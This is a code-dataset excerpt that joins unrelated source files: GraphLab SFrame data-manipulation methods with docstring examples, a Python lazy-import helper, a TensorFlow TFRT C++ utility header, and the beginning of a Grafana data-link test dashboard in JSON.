| 2 | 5 | 43 |
+----+-----------------+-------------------+
"""
if expand_column not in self.column_names():
raise KeyError("column '" + expand_column + "' does not exist in current SFrame")
if column_name_prefix == None:
column_name_prefix = expand_column
new_sf = self[expand_column].split_datetime(column_name_prefix, limit, tzone)
# construct return SFrame, check if there is conflict
rest_columns = [name for name in self.column_names() if name != expand_column]
new_names = new_sf.column_names()
while set(new_names).intersection(rest_columns):
new_names = [name + ".1" for name in new_names]
new_sf.rename(dict(zip(new_sf.column_names(), new_names)))
_mt._get_metric_tracker().track('sframe.split_datetime')
ret_sf = self.select_columns(rest_columns)
ret_sf.add_columns(new_sf)
return ret_sf
def unpack(self, unpack_column, column_name_prefix=None, column_types=None,
na_value=None, limit=None):
"""
Expand one column of this SFrame to multiple columns with each value in
a separate column. Returns a new SFrame with the unpacked column
replaced with a list of new columns. The column must be of
list/array/dict type.
For more details regarding name generation, missing value handling and
other, refer to the SArray version of
:py:func:`~graphlab.SArray.unpack()`.
Parameters
----------
unpack_column : str
Name of the unpacked column
column_name_prefix : str, optional
If provided, unpacked column names would start with the given
prefix. If not provided, default value is the name of the unpacked
column.
column_types : [type], optional
Column types for the unpacked columns.
If not provided, column types are automatically inferred from first
100 rows. For array type, default column types are float. If
provided, column_types also restricts how many columns to unpack.
na_value : flexible_type, optional
If provided, convert all values that are equal to "na_value" to
missing value (None).
limit : list[str] | list[int], optional
Control unpacking only a subset of list/array/dict value. For
dictionary SArray, `limit` is a list of dictionary keys to restrict.
For list/array SArray, `limit` is a list of integers that are
indexes into the list/array value.
Returns
-------
out : SFrame
A new SFrame that contains rest of columns from original SFrame with
the given column replaced with a collection of unpacked columns.
See Also
--------
pack_columns, SArray.unpack
Examples
---------
>>> sf = graphlab.SFrame({'id': [1,2,3],
... 'wc': [{'a': 1}, {'b': 2}, {'a': 1, 'b': 2}]})
+----+------------------+
| id | wc |
+----+------------------+
| 1 | {'a': 1} |
| 2 | {'b': 2} |
| 3 | {'a': 1, 'b': 2} |
+----+------------------+
[3 rows x 2 columns]
>>> sf.unpack('wc')
+----+------+------+
| id | wc.a | wc.b |
+----+------+------+
| 1 | 1 | None |
| 2 | None | 2 |
| 3 | 1 | 2 |
+----+------+------+
[3 rows x 3 columns]
To not have prefix in the generated column name:
>>> sf.unpack('wc', column_name_prefix="")
+----+------+------+
| id | a | b |
+----+------+------+
| 1 | 1 | None |
| 2 | None | 2 |
| 3 | 1 | 2 |
+----+------+------+
[3 rows x 3 columns]
To limit subset of keys to unpack:
>>> sf.unpack('wc', limit=['b'])
+----+------+
| id | wc.b |
+----+------+
| 1 | None |
| 2 | 2 |
| 3 | 2 |
+----+------+
[3 rows x 3 columns]
To unpack an array column:
>>> sf = graphlab.SFrame({'id': [1,2,3],
... 'friends': [array.array('d', [1.0, 2.0, 3.0]),
... array.array('d', [2.0, 3.0, 4.0]),
... array.array('d', [3.0, 4.0, 5.0])]})
>>> sf
+----+-----------------------------+
| id | friends |
+----+-----------------------------+
| 1 | array('d', [1.0, 2.0, 3.0]) |
| 2 | array('d', [2.0, 3.0, 4.0]) |
| 3 | array('d', [3.0, 4.0, 5.0]) |
+----+-----------------------------+
[3 rows x 2 columns]
>>> sf.unpack('friends')
+----+-----------+-----------+-----------+
| id | friends.0 | friends.1 | friends.2 |
+----+-----------+-----------+-----------+
| 1 | 1.0 | 2.0 | 3.0 |
| 2 | 2.0 | 3.0 | 4.0 |
| 3 | 3.0 | 4.0 | 5.0 |
+----+-----------+-----------+-----------+
[3 rows x 4 columns]
"""
if unpack_column not in self.column_names():
raise KeyError("column '" + unpack_column + "' does not exist in current SFrame")
if column_name_prefix == None:
column_name_prefix = unpack_column
new_sf = self[unpack_column].unpack(column_name_prefix, column_types, na_value, limit)
# construct return SFrame, check if there is conflict
rest_columns = [name for name in self.column_names() if name != unpack_column]
new_names = new_sf.column_names()
while set(new_names).intersection(rest_columns):
new_names = [name + ".1" for name in new_names]
new_sf.rename(dict(zip(new_sf.column_names(), new_names)))
_mt._get_metric_tracker().track('sframe.unpack')
ret_sf = self.select_columns(rest_columns)
ret_sf.add_columns(new_sf)
return ret_sf
def stack(self, column_name, new_column_name=None, drop_na=False):
"""
Convert a "wide" column of an SFrame to one or two "tall" columns by
stacking all values.
The stack works only for columns of dict, list, or array type. If the
column is dict type, two new columns are created as a result of
stacking: one column holds the key and another column holds the value.
The rest of the columns are repeated for each key/value pair.
If the column is array or list type, one new column is created as a
result of stacking. With each row holds one element of the array or list
value, and the rest columns from the same original row repeated.
The new SFrame includes the newly created column and all columns other
than the one that is stacked.
Parameters
--------------
column_name : str
The column to stack. This column must be of dict/list/array type
new_column_name : str | list of str, optional
The new column name(s). If original column is list/array type,
new_column_name must a string. If original column is dict type,
new_column_name must be a list of two strings. If not given, column
names are generated automatically.
drop_na : boolean, optional
If True, missing values and empty list/array/dict are all dropped
from the resulting column(s). If False, missing values are
maintained in stacked column(s).
Returns
-------
out : SFrame
A new SFrame that contains newly stacked column(s) plus columns in
original SFrame other than the stacked column.
See Also
--------
unstack
Examples
---------
Suppose 'sf' is an SFrame that contains a column of dict type:
>>> sf = graphlab.SFrame({'topic':[1,2,3,4],
... 'words': [{'a':3, 'cat':2},
... {'a':1, 'the':2},
... {'the':1, 'dog':3},
... {}]
... })
+-------+----------------------+
| topic | words |
+-------+----------------------+
| 1 | {'a': 3, 'cat': 2} |
| 2 | {'a': 1, 'the': 2} |
| 3 | {'the': 1, 'dog': 3} |
| 4 | {} |
+-------+----------------------+
[4 rows x 2 columns]
Stack would stack all keys in one column and all values in another
column:
>>> sf.stack('words', new_column_name=['word', 'count'])
+-------+------+-------+
| topic | word | count |
+-------+------+-------+
| 1 | a | 3 |
| 1 | cat | 2 |
| 2 | a | 1 |
| 2 | the | 2 |
| 3 | the | 1 |
| 3 | dog | 3 |
| 4 | None | None |
+-------+------+-------+
[7 rows x 3 columns]
Observe that since topic 4 had no words, an empty row is inserted.
To drop that row, set dropna=True in the parameters to stack.
Suppose 'sf' is an SFrame that contains a user and his/her friends,
where 'friends' columns is an array type. Stack on 'friends' column
would create a user/friend list for each user/friend pair:
>>> sf = graphlab.SFrame({'topic':[1,2,3],
... 'friends':[[2,3,4], [5,6],
... [4,5,10,None]]
... })
>>> sf
+-------+------------------+
| topic | friends |
+-------+------------------+
| 1 | [2, 3, 4] |
| 2 | [5, 6] |
| 3 | [4, 5, 10, None] |
+----- -+------------------+
[3 rows x 2 columns]
>>> sf.stack('friends', new_column_name='friend')
+------+--------+
| user | friend |
+------+--------+
| 1 | 2 |
| 1 | 3 |
| 1 | 4 |
| 2 | 5 |
| 2 | 6 |
| 3 | 4 |
| 3 | 5 |
| 3 | 10 |
| 3 | None |
+------+--------+
[9 rows x 2 columns]
"""
# validate column_name
column_name = str(column_name)
if column_name not in self.column_names():
raise ValueError("Cannot find column '" + str(column_name) + "' in the SFrame.")
stack_column_type = self[column_name].dtype()
if (stack_column_type not in [dict, array.array, list]):
raise TypeError("Stack is only supported for column of dict/list/array type.")
if (new_column_name != None):
if stack_column_type == dict:
if (type(new_column_name) is not list):
raise TypeError("new_column_name has to be a list to stack dict type")
elif (len(new_column_name) != 2):
raise TypeError("new_column_name must have length of two")
else:
if (type(new_column_name) != str):
raise TypeError("new_column_name has to be a str")
new_column_name = [new_column_name]
# check if the new column name conflicts with existing ones
for name in new_column_name:
if (name in self.column_names()) and (name != column_name):
raise ValueError("Column with name '" + name + "' already exists, pick a new column name")
else:
if stack_column_type == dict:
new_column_name = ["",""]
else:
new_column_name = [""]
# infer column types
head_row = SArray(self[column_name].head(100)).dropna()
if (len(head_row) == 0):
raise ValueError("Cannot infer column type because there is not enough rows to infer value")
if stack_column_type == dict:
# infer key/value type
keys = []; values = []
for row in head_row:
for val in row:
keys.append(val)
if val != None: values.append(row[val])
new_column_type = [
infer_type_of_list(keys),
infer_type_of_list(values)
]
else:
values = [v for v in itertools.chain.from_iterable(head_row)]
new_column_type = [infer_type_of_list(values)]
_mt._get_metric_tracker().track('sframe.stack')
with cython_context():
return SFrame(_proxy=self.__proxy__.stack(column_name, new_column_name, new_column_type, drop_na))
def unstack(self, column, new_column_name=None):
"""
Concatenate values from one or two columns into one column, grouping by
all other columns. The resulting column could be of type list, array or
dictionary. If ``column`` is a numeric column, the result will be of
array.array type. If ``column`` is a non-numeric column, the new column
will be of list type. If ``column`` is a list of two columns, the new
column will be of dict type where the keys are taken from the first
column in the list.
Parameters
----------
column : str | [str, str]
The column(s) that is(are) to be concatenated.
If str, then collapsed column type is either array or list.
If [str, str], then collapsed column type is dict
new_column_name : str, optional
New column name. If not given, a name is generated automatically.
Returns
-------
out : SFrame
A new SFrame containing the grouped columns as well as the new
column.
See Also
--------
stack : The inverse of unstack.
groupby : ``unstack`` is a special version of ``groupby`` that uses the
:mod:`~graphlab.aggregate.CONCAT` aggregator
Notes
-----
- There is no guarantee the resulting SFrame maintains the same order as
the original SFrame.
- Missing values are maintained during unstack.
- When unstacking into a dictionary, if there is more than one instance
of a given key for a particular group, an arbitrary value is selected.
Examples
--------
>>> sf = graphlab.SFrame({'count':[4, 2, 1, 1, 2, None],
... 'topic':['cat', 'cat', 'dog', 'elephant', 'elephant', 'fish'],
... 'word':['a', 'c', 'c', 'a', 'b', None]})
>>> sf.unstack(column=['word', 'count'], new_column_name='words')
+----------+------------------+
| topic | words |
+----------+------------------+
| elephant | {'a': 1, 'b': 2} |
| dog | {'c': 1} |
| cat | {'a': 4, 'c': 2} |
| fish | None |
+----------+------------------+
[4 rows x 2 columns]
>>> sf = graphlab.SFrame({'friend': [2, 3, 4, 5, 6, 4, 5, 2, 3],
... 'user': [1, 1, 1, 2, 2, 2, 3, 4, 4]})
>>> sf.unstack('friend', new_column_name='friends')
+------+-----------------------------+
| user | friends |
+------+-----------------------------+
| 3 | array('d', [5.0]) |
| 1 | array('d', [2.0, 4.0, 3.0]) |
| 2 | array('d', [5.0, 6.0, 4.0]) |
| 4 | array('d', [2.0, 3.0]) |
+------+-----------------------------+
[4 rows x 2 columns]
"""
if (type(column) != str and len(column) != 2):
raise TypeError("'column' parameter has to be either a string or a list of two strings.")
_mt._get_metric_tracker().track('sframe.unstack')
with cython_context():
if type(column) == str:
key_columns = [i for i in self.column_names() if i != column]
if new_column_name != None:
return self.groupby(key_columns, {new_column_name : graphlab.aggregate.CONCAT(column)})
else:
return self.groupby(key_columns, graphlab.aggregate.CONCAT(column))
elif len(column) == 2:
key_columns = [i for i in self.column_names() if i not in column]
if new_column_name != None:
return self.groupby(key_columns, {new_column_name:graphlab.aggregate.CONCAT(column[0], column[1])})
else:
return self.groupby(key_columns, graphlab.aggregate.CONCAT(column[0], column[1]))
def unique(self):
"""
Remove duplicate rows of the SFrame. Will not necessarily preserve the
order of the given SFrame in the new SFrame.
Returns
-------
out : SFrame
A new SFrame that contains the unique rows of the current SFrame.
Raises
------
TypeError
If any column in the SFrame is a dictionary type.
See Also
--------
SArray.unique
Examples
--------
>>> sf = graphlab.SFrame({'id':[1,2,3,3,4], 'value':[1,2,3,3,4]})
>>> sf
+----+-------+
| id | value |
+----+-------+
| 1 | 1 |
| 2 | 2 |
| 3 | 3 |
| 3 | 3 |
| 4 | 4 |
+----+-------+
[5 rows x 2 columns]
>>> sf.unique()
+----+-------+
| id | value |
+----+-------+
| 2 | 2 |
| 4 | 4 |
| 3 | 3 |
| 1 | 1 |
+----+-------+
[4 rows x 2 columns]
"""
return self.groupby(self.column_names(),{})
def sort(self, sort_columns, ascending=True):
"""
Sort current SFrame by the given columns, using the given sort order.
Only columns that are type of str, int and float can be sorted.
Parameters
----------
sort_columns : str | list of str | list of (str, bool) pairs
Names of columns to be sorted. The result will be sorted first by
first column, followed by second column, and so on. All columns will
be sorted in the same order as governed by the `ascending`
parameter. To control the sort ordering for each column
individually, `sort_columns` must be a list of (str, bool) pairs.
Given this case, the first value is the column name and the second
value is a boolean indicating whether the sort order is ascending.
ascending : bool, optional
Sort all columns in the given order.
Returns
-------
out : SFrame
A new SFrame that is sorted according to given sort criteria
See Also
--------
topk
Examples
--------
Suppose 'sf' is an sframe that has three columns 'a', 'b', 'c'.
To sort by column 'a', ascending
>>> sf = graphlab.SFrame({'a':[1,3,2,1],
... 'b':['a','c','b','b'],
... 'c':['x','y','z','y']})
>>> sf
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 3 | c | y |
| 2 | b | z |
| 1 | b | y |
+---+---+---+
[4 rows x 3 columns]
>>> sf.sort('a')
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 1 | b | y |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a', descending
>>> sf.sort('a', ascending = False)
+---+---+---+
| a | b | c |
+---+---+---+
| 3 | c | y |
| 2 | b | z |
| 1 | a | x |
| 1 | b | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a' and 'b', all ascending
>>> sf.sort(['a', 'b'])
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | a | x |
| 1 | b | y |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
To sort by column 'a' ascending, and then by column 'c' descending
>>> sf.sort([('a', True), ('c', False)])
+---+---+---+
| a | b | c |
+---+---+---+
| 1 | b | y |
| 1 | a | x |
| 2 | b | z |
| 3 | c | y |
+---+---+---+
[4 rows x 3 columns]
"""
sort_column_names = []
sort_column_orders = []
# validate sort_columns
if (type(sort_columns) == str):
sort_column_names = [sort_columns]
elif (type(sort_columns) == list):
if (len(sort_columns) == 0):
raise ValueError("Please provide at least one column to sort")
first_param_types = set([type(i) for i in sort_columns])
if (len(first_param_types) != 1):
raise ValueError("sort_columns element are not of the same type")
first_param_type = first_param_types.pop()
if (first_param_type == tuple):
sort_column_names = [i[0] for i in sort_columns]
sort_column_orders = [i[1] for i in sort_columns]
elif(first_param_type == str):
sort_column_names = sort_columns
else:
raise TypeError("sort_columns type is not supported")
else:
raise TypeError("sort_columns type is not correct. Supported types are str, list of str or list of (str,bool) pair.")
# use the second parameter if the sort order is not given
if (len(sort_column_orders) == 0):
sort_column_orders = [ascending for i in sort_column_names]
# make sure all column exists
my_column_names = set(self.column_names())
for column in sort_column_names:
if (type(column) != str):
raise TypeError("Only string parameter can be passed in as column names")
if (column not in my_column_names):
raise ValueError("SFrame has no column named: '" + str(column) + "'")
if (self[column].dtype() not in (str, int, float,datetime.datetime)):
raise TypeError("Only columns of type (str, int, float) can be sorted")
_mt._get_metric_tracker().track('sframe.sort')
with cython_context():
return SFrame(_proxy=self.__proxy__.sort(sort_column_names, sort_column_orders))
def dropna(self, columns=None, how='any'):
"""
Remove missing values from an SFrame. A missing value is either ``None``
or ``NaN``. If ``how`` is 'any', a row will be removed if any of the
columns in the ``columns`` parameter contains at least one missing
value. If ``how`` is 'all', a row will be removed if all of the columns
in the ``columns`` parameter are missing values.
If the ``columns`` parameter is not specified, the default is to
consider all columns when searching for missing values.
Parameters
----------
columns : list or str, optional
The columns to use when looking for missing values. By default, all
columns are used.
how : {'any', 'all'}, optional
Specifies whether a row should be dropped if at least one column
has missing values, or if all columns have missing values. 'any' is
default.
Returns
-------
out : SFrame
SFrame with missing values removed (according to the given rules).
See Also
--------
dropna_split : Drops missing rows from the SFrame and returns them.
Examples
--------
Drop all missing values.
>>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
>>> sf.dropna()
+---+---+
| a | b |
+---+---+
| 1 | a |
+---+---+
[1 rows x 2 columns]
Drop rows where every value is missing.
>>> sf.dropna(any="all")
+------+---+
| a | b |
+------+---+
| 1 | a |
| None | b |
+------+---+
[2 rows x 2 columns]
Drop rows where column 'a' has a missing value.
>>> sf.dropna('a', any="all")
+---+---+
| a | b |
+---+---+
| 1 | a |
+---+---+
[1 rows x 2 columns]
"""
_mt._get_metric_tracker().track('sframe.dropna')
# If the user gives me an empty list (the indicator to use all columns)
# NA values being dropped would not be the expected behavior. This
# is a NOOP, so let's not bother the server
if type(columns) is list and len(columns) == 0:
return SFrame(_proxy=self.__proxy__)
(columns, all_behavior) = self.__dropna_errchk(columns, how)
with cython_context():
return SFrame(_proxy=self.__proxy__.drop_missing_values(columns, all_behavior, False))
def dropna_split(self, columns=None, how='any'):
"""
Split rows with missing values from this SFrame. This function has the
same functionality as :py:func:`~graphlab.SFrame.dropna`, but returns a
tuple of two SFrames. The first item is the expected output from
:py:func:`~graphlab.SFrame.dropna`, and the second item contains all the
rows filtered out by the `dropna` algorithm.
Parameters
----------
columns : list or str, optional
The columns to use when looking for missing values. By default, all
columns are used.
how : {'any', 'all'}, optional
Specifies whether a row should be dropped if at least one column
has missing values, or if all columns have missing values. 'any' is
default.
Returns
-------
out : (SFrame, SFrame)
(SFrame with missing values removed,
SFrame with the removed missing values)
See Also
--------
dropna
Examples
--------
>>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
>>> good, bad = sf.dropna_split()
>>> good
+---+---+
| a | b |
+---+---+
| 1 | a |
+---+---+
[1 rows x 2 columns]
>>> bad
+------+------+
| a | b |
+------+------+
| None | b |
| None | None |
+------+------+
[2 rows x 2 columns]
"""
_mt._get_metric_tracker().track('sframe.dropna_split')
# If the user gives me an empty list (the indicator to use all columns)
# NA values being dropped would not be the expected behavior. This
# is a NOOP, so let's not bother the server
if type(columns) is list and len(columns) == 0:
return (SFrame(_proxy=self.__proxy__), SFrame())
(columns, all_behavior) = self.__dropna_errchk(columns, how)
sframe_tuple = self.__proxy__.drop_missing_values(columns, all_behavior, True)
if len(sframe_tuple) != 2:
raise RuntimeError("Did not return two SFrames!")
with cython_context():
return (SFrame(_proxy=sframe_tuple[0]), SFrame(_proxy=sframe_tuple[1]))
def __dropna_errchk(self, columns, how):
if columns is None:
# Default behavior is to consider every column, specified to
# the server by an empty list (to avoid sending all the column
# in this case, since it is the most common)
columns = list()
elif type(columns) is str:
columns = [columns]
elif type(columns) is not list:
raise TypeError("Must give columns as a list, str, or 'None'")
else:
# Verify that we are only passing strings in our list
list_types = set([type(i) for i in columns])
if (str not in list_types) or (len(list_types) > 1):
raise TypeError("All columns must be of 'str' type")
if how not in ['any','all']:
raise ValueError("Must specify 'any' or 'all'")
if how == 'all':
all_behavior = True
else:
all_behavior = False
return (columns, all_behavior)
def fillna(self, column, value):
"""
Fill all missing values with a given value in a given column. If the
``value`` is not the same type as the values in ``column``, this method
attempts to convert the value to the original column's type. If this
fails, an error is raised.
Parameters
----------
column : str
The name of the column to modify.
value : type convertible to SArray's type
The value used to replace all missing values.
Returns
-------
out : SFrame
A new SFrame with the specified value in place of missing values.
See Also
--------
dropna
Examples
--------
>>> sf = graphlab.SFrame({'a':[1, None, None],
... 'b':['13.1', '17.2', None]})
>>> sf = sf.fillna('a', 0)
>>> sf
+---+------+
| a | b |
+---+------+
| 1 | 13.1 |
| 0 | 17.2 |
| 0 | None |
+---+------+
[3 rows x 2 columns]
"""
# Normal error checking
if type(column) is not str:
raise TypeError("Must give column name as a str")
ret = self[self.column_names()]
ret[column] = ret[column].fillna(value)
return ret
def add_row_number(self, column_name='id', start=0):
"""
Returns a new SFrame with a new column that numbers each row
sequentially. By default the count starts at 0, but this can be changed
to a positive or negative number. The new column will be named with
the given column name. An error will be raised if the given column
name already exists in the SFrame.
Parameters
----------
column_name : str, optional
The name of the new column that will hold the row numbers.
start : int, optional
The number used to start the row number count.
Returns
-------
out : SFrame
The new SFrame with a column name
Notes
-----
The range of numbers is constrained by a signed 64-bit integer, so
beware of overflow if you think the results in the row number column
will be greater than 9 quintillion.
Examples
--------
>>> sf = graphlab.SFrame({'a': [1, None, None], 'b': ['a', 'b', None]})
>>> sf.add_row_number()
+----+------+------+
| id | a | b |
+----+------+------+
| 0 | 1 | a |
| 1 | None | b |
| 2 | None | None |
+----+------+------+
[3 rows x 3 columns]
"""
_mt._get_metric_tracker().track('sframe.add_row_number')
if type(column_name) is not str:
raise TypeError("Must give column_name as strs")
if type(start) is not int:
raise TypeError("Must give start as int")
if column_name in self.column_names():
raise RuntimeError("Column '" + column_name + "' already exists in the current SFrame")
the_col = _create_sequential_sarray(self.num_rows(), start)
# Make sure the row number column is the first column
new_sf = SFrame()
new_sf.add_column(the_col, column_name)
new_sf.add_columns(self)
return new_sf
@property
def shape(self):
"""
The shape of the SFrame, in a tuple. The first entry is the number of
rows, the second is the number of columns.
Examples
--------
>>> sf = graphlab.SFrame({'id':[1,2,3], 'val':['A','B','C']})
>>> sf.shape
(3, 2)
"""
return (self.num_rows(), self.num_cols())
@property
def __proxy__(self):
return self._proxy
@__proxy__.setter
def __proxy__(self, value):
assert type(value) is UnitySFrameProxy
self._proxy = value | unknown | codeparrot/codeparrot-clean | ||
import importlib
def relative_import(parent_name, rel_modules=(), rel_classes=()):
"""
Helper function to import submodules lazily in Python 3.7+
Parameters
----------
rel_modules: list of str
list of submodules to import, of the form .submodule
rel_classes: list of str
list of submodule classes/variables to import, of the form ._submodule.Foo
Returns
-------
tuple
Tuple that should be assigned to __all__, __getattr__ in the caller
"""
module_names = {rel_module.split(".")[-1]: rel_module for rel_module in rel_modules}
class_names = {rel_path.split(".")[-1]: rel_path for rel_path in rel_classes}
def __getattr__(import_name):
# In Python 3.7+, lazy import submodules
# Check for submodule
if import_name in module_names:
rel_import = module_names[import_name]
return importlib.import_module(rel_import, parent_name)
# Check for submodule class
if import_name in class_names:
rel_path_parts = class_names[import_name].split(".")
rel_module = ".".join(rel_path_parts[:-1])
class_name = import_name
class_module = importlib.import_module(rel_module, parent_name)
return getattr(class_module, class_name)
raise AttributeError(
"module {__name__!r} has no attribute {name!r}".format(
name=import_name, __name__=parent_name
)
)
__all__ = list(module_names) + list(class_names)
def __dir__():
return __all__
return __all__, __getattr__, __dir__ | unknown | codeparrot/codeparrot-clean | ||
/* Copyright 2021 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
==============================================================================*/
#ifndef TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_
#define TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_
#include <cstdint>
#include <memory>
#include <string>
#include <vector>
#include "absl/status/status.h"
#include "tensorflow/core/framework/types.pb.h"
#include "tensorflow/core/lib/gtl/array_slice.h"
#include "tensorflow/core/platform/errors.h"
#include "tensorflow/core/platform/statusor.h"
#include "tensorflow/core/platform/strcat.h"
#include "tensorflow/core/tfrt/runtime/runtime.h"
#include "tfrt/bef/bef_buffer.h" // from @tf_runtime
#include "tfrt/dtype/dtype.h" // from @tf_runtime
#include "tfrt/support/forward_decls.h" // from @tf_runtime
namespace tensorflow {
class Device;
} // namespace tensorflow
namespace tfrt {
class BEFFile;
class ExecutionContext;
class HostContext;
typedef absl::InlinedVector<tfrt::DType, 4UL> TfrtDataTypeVector;
typedef absl::Span<const tfrt::DType> TfrtDataTypeSlice;
DType ConvertTfDTypeToTfrtDType(tensorflow::DataType dtype);
// Runs the runtime initialization function. A runtime initialization function
// is added by runtime/compiler workflow and is not present in the original
// savedmodel.
//
// TODO(b/178714905): We should avoid special handling on initialization by
// letting compiler to handle it.
absl::Status RunRuntimeInitializer(const tfrt::ExecutionContext& exec_ctx,
tfrt::BEFFile* bef_file,
absl::string_view fallback_init_func);
// Creates dummy TF devices from the input device names. Currently this method
// is used to create the TPU_SYSTEM device for worker server.
void CreateDummyTfDevices(
const std::vector<std::string>& device_names,
std::vector<std::unique_ptr<tensorflow::Device>>* dummy_tf_devices);
// Creates and add dummy TFRT devices from the input device names. Currently
// this method is used to create the TPU_SYSTEM device for worker server.
void AddDummyTfrtDevices(const std::vector<std::string>& device_names,
tfrt::HostContext* host_ctx);
// Creates a BEF file from a BEF buffer. `runtime` is used to provide host
// context for opening `bef`.
absl::StatusOr<RCReference<tfrt::BEFFile>> CreateBefFileFromBefBuffer(
const tensorflow::tfrt_stub::Runtime& runtime, const tfrt::BefBuffer& bef);
// Returns a unique integer within this process.
int64_t GetUniqueInt();
// Returns current CPU time.
uint64_t GetCpuClockCycle();
// A list of macros similar to `TF_RETURN_IF_ERROR`, with additional model
// loading stage info.
#define RETURN_IF_ERROR_IN_IMPORT(...) \
RETURN_IF_ERROR_WITH_STAGE_INFO("GraphDef proto -> MLIR", __VA_ARGS__)
#define RETURN_IF_ERROR_IN_COMPILE(...) \
RETURN_IF_ERROR_WITH_STAGE_INFO( \
"TF dialect -> TFRT dialect, compiler issue, please contact the TFRT " \
"team", \
__VA_ARGS__)
#define RETURN_IF_ERROR_IN_INIT(...) \
RETURN_IF_ERROR_WITH_STAGE_INFO("Initialize TFRT", __VA_ARGS__)
#define RETURN_IF_ERROR_WITH_STAGE_INFO(stage, ...) \
do { \
::tensorflow::Status _status = (__VA_ARGS__); \
if (TF_PREDICT_FALSE(!_status.ok())) { \
return ::tensorflow::errors::CreateWithUpdatedMessage( \
_status, \
::tensorflow::strings::StrCat(stage, ": ", _status.message())); \
} \
} while (0)
// A list of macros similar to `TF_ASSIGN_OR_RETURN`, with additional model
// loading stage info.
#define ASSIGN_OR_RETURN_IN_IMPORT(lhs, rexpr) \
ASSIGN_OR_RETURN_WITH_STAGE_INFO("GraphDef proto -> MLIR", lhs, rexpr)
#define ASSIGN_OR_RETURN_IN_COMPILE(lhs, rexpr) \
ASSIGN_OR_RETURN_WITH_STAGE_INFO( \
"TF dialect -> TFRT dialect, compiler issue, please contact the TFRT " \
"team", \
lhs, rexpr)
#define ASSIGN_OR_RETURN_IN_INIT(lhs, rexpr) \
ASSIGN_OR_RETURN_WITH_STAGE_INFO("Initialize TFRT", lhs, rexpr)
#define ASSIGN_OR_RETURN_WITH_STAGE_INFO(stage, lhs, rexpr) \
ASSIGN_OR_RETURN_WITH_STAGE_INFO_IMPL( \
TF_STATUS_MACROS_CONCAT_NAME(_status_or_value, __COUNTER__), stage, lhs, \
rexpr)
#define ASSIGN_OR_RETURN_WITH_STAGE_INFO_IMPL(statusor, stage, lhs, rexpr) \
auto statusor = (rexpr); \
if (TF_PREDICT_FALSE(!statusor.ok())) { \
const auto& _status = statusor.status(); \
return ::tensorflow::errors::CreateWithUpdatedMessage( \
_status, \
::tensorflow::strings::StrCat(stage, ": ", _status.message())); \
} \
lhs = std::move(statusor.value())
} // namespace tfrt
#endif // TENSORFLOW_CORE_TFRT_UTILS_UTILS_H_ | c | github | https://github.com/tensorflow/tensorflow | tensorflow/core/tfrt/utils/utils.h |
{
"annotations": {
"list": [
{
"builtIn": 1,
"datasource": {
"uid": "-- Grafana --"
},
"enable": true,
"hide": true,
"iconColor": "rgba(0, 211, 255, 1)",
"name": "Annotations \u0026 Alerts",
"type": "dashboard"
}
]
},
"editable": true,
"fiscalYearStartMonth": 0,
"graphTooltip": 0,
"links": [],
"panels": [
{
"content": "## Data link variables overview\n\nThis dashboard presents variables that one can use when creating *data links*. All links redirect to this dashboard and this panel represents the values that were interpolated in the link that was clicked.\n\n\n#### Series variables\n1. **Name:** \u003cspan style=\"color: orange;\"\u003e$seriesName\u003c/span\u003e\n2. **label.datacenter:** \u003cspan style=\"color: orange;\"\u003e$labelDatacenter\u003c/span\u003e\n3. **label.datacenter.region:** \u003cspan style=\"color: orange;\"\u003e$labelDatacenterRegion\u003c/span\u003e\n\n#### Field variables\n1. **Name:** \u003cspan style=\"color: orange;\"\u003e$fieldName\u003c/span\u003e\n\n#### Value variables\n1. **Time:** \u003cspan style=\"color: orange;\"\u003e$valueTime\u003c/span\u003e\n2. **Numeric:** \u003cspan style=\"color: orange;\"\u003e$valueNumeric\u003c/span\u003e\n3. **Text:** \u003cspan style=\"color: orange;\"\u003e$valueText\u003c/span\u003e\n4. **Calc:** \u003cspan style=\"color: orange;\"\u003e$valueCalc\u003c/span\u003e\n\n",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"gridPos": {
"h": 16,
"w": 6,
"x": 0,
"y": 0
},
"id": 8,
"mode": "markdown",
"targets": [
{
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"refId": "A"
}
],
"transparent": true,
"type": "text"
},
{
"aliasColors": {},
"autoMigrateFrom": "graph",
"bars": false,
"dashLength": 10,
"dashes": false,
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"fill": 1,
"fillGradient": 0,
"gridPos": {
"h": 8,
"w": 9,
"x": 6,
"y": 0
},
"id": 2,
"legend": {
"avg": false,
"current": false,
"max": false,
"min": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"nullPointMode": "null",
"options": {
"dataLinks": [
{
"targetBlank": false,
"title": "Drill it down",
"url": "/d/wfTJJL5Wz/datalinks-source?var-seriesName=${__series.name}\u0026var-labelDatacenter=${__field.labels.datacenter}\u0026var-labelDatacenterRegion=${__field.labels[\"datacenter.region\"]}\u0026var-valueTime=${__value.time}\u0026var-valueNumeric=${__value.numeric}\u0026var-valueText=${__value.text}"
}
]
},
"percentage": false,
"pointradius": 2,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"spaceLength": 10,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "Foo datacenter",
"datasource": {
"apiVersion": "v1",
"type": "grafana-testdata-datasource",
"uid": "testdata-type-uid"
},
"labels": "datacenter=foo,datacenter.region=us-east-1",
"refId": "A",
"scenarioId": "random_walk"
},
{
